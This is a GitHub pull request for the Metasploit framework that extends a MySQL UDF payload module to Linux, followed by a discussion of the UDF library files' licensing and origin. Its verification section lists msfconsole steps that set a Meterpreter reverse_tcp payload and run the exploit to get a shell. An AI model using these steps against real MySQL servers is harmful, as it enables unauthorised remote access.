
mysql UDF now with more linux #9170

Merged
merged 3 commits into from Dec 22, 2017

Conversation

@h00die (Contributor) commented Nov 3, 2017

This PR changes the mysql_payload module to work against Linux targets as well. Please note all the changes required on the target to make the system exploitable.

Verification

To create a vulnerable linux environment, see markdown docs

  • Start msfconsole
  • use exploit/multi/mysql/mysql_udf_payload
  • set payload linux/x86/meterpreter/reverse_tcp
  • set lhost [ip]
  • set rhost [ip]
  • set srvhost [ip]
  • set srvport [port]
  • set password [password]
  • set target 1
  • exploit
  • get a shell

@h00die (Contributor, Author) commented Nov 3, 2017

@bcook-r7 The .so files came from golismero, installed to /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so on Kali. Someone (lawyer-ish) may need to review their license to see if this could be added directly, or someone smart needs to create our own .so file. I'm not qualified to do license review or make .so files. Just wanted it on the record and a heads up.

@0x27 commented Nov 3, 2017

The actual source repo for the UDF objects is here: https://github.com/sqlmapproject/udfhack; it's licensed under the LGPL.

@acammack-r7 acammack-r7 added blocked Blocked by one or more additional tasks enhancement payload licensing labels Nov 3, 2017
@h00die (Contributor, Author) commented Nov 3, 2017

I didn't look into what the exact difference was; however, this is the reason I specifically said golismero and showed the path rather than saying it was from sqlmap.

root@k:/# md5sum /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so
ab27f6c7634e9efc13fb2db29216a0a8  /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so
root@k:/# md5sum /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_
1501fa7150239b18acc0f4a9db2ebc0d  /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

@h00die h00die removed the blocked Blocked by one or more additional tasks label Nov 4, 2017
@acammack-r7 acammack-r7 assigned acammack-r7 and wvu and unassigned acammack-r7 Nov 8, 2017
@wvu (Contributor) commented Nov 8, 2017

We need to get legal to look at this. Something like that.

@h00die (Contributor, Author) commented Nov 9, 2017

No prob, I think that would be for the best.
If there is an issue, but the license on the sqlmap one is more favorable, I can attempt to look at the source to figure out what the difference is.

@busterb (Member) commented Nov 21, 2017

We already have LGPL code in the tree (metasm) and GPL exploit code. This is fine. It does need a source link or copy in the tree so we meet distribution guidelines for GPL.

@h00die (Contributor, Author) commented Dec 11, 2017

Any time to get some lovin' on this one?

@wvu (Contributor) commented Dec 11, 2017

I don't think we've got any movement on this one yet.

@busterb (Member) commented Dec 22, 2017

It's totally fine to move forward, no blockers.

@wvu wvu merged commit c9e3b88 into rapid7:master Dec 22, 2017
wvu added a commit that referenced this pull request Dec 22, 2017
@wvu (Contributor) commented Dec 22, 2017

Release Notes

The exploit/windows/mysql/mysql_payload module has been renamed exploit/multi/mysql/mysql_udf_payload and now supports Linux systems.

@busterb (Member) commented Dec 22, 2017

Thanks guys! 💪

@wvu (Contributor) commented Dec 22, 2017

dc2b5df

@h00die h00die deleted the linux_mysql_payload branch December 23, 2017 13:40
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jan 10, 2018